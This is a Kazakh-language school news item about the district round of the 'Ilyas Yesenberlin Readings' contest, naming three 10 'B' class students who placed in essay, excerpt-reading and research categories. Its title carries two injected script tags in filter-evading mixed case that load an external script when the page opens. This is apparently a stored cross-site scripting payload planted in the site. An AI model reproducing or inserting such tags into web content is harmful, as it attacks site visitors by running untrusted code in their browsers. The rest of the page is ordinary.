«Ілияс Есенберлин оқулары» байқауының аудандық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.04.2024 2024 жылдың 19 сәуірінде 8-11 сынып оқушылары арасында «Ілияс Есенберлин оқулары» байқауының аудандық кезеңі өткізілді. Ережеге сәйкес байқауға қатысушылар 3 номинация бойынша сайысқа түсті. Қазылар алқасының шешімі бойынша байқау қорытындысы: «Тарихтың көркем суреткері» - эссе жазу номинациясынан мектебіміздің 10 «Б» сынып оқушысы Максут Наргиз – І орын иеленді. «Жазушының көркемдік әлеміне бойласақ...» үзінді оқу номинациясы бойынша 10 «Б» сынып оқушысы Берікбол Темірлан – І орын иеленді. «Ілияс Есенберлин шығармаларының тақырыптық – идеялық жүйесі» шығармашылық зерттеу жұмысы номинациясынан 10 «Б» сынып оқушысы Оңдасын Нұрислам – ІІ орын иеленді. Жеңімпаз оқушылардың жетекші пән мұғалімі Абдрахманова Айгүл Ертаевна. Жеңімпаздарды құттықтаймыз және байқаудың облыстық кезеңінде сәттілік тілейміз!!!
Просмотров: 887


Пікір қосу



Деректерді қолтаңбаға қосу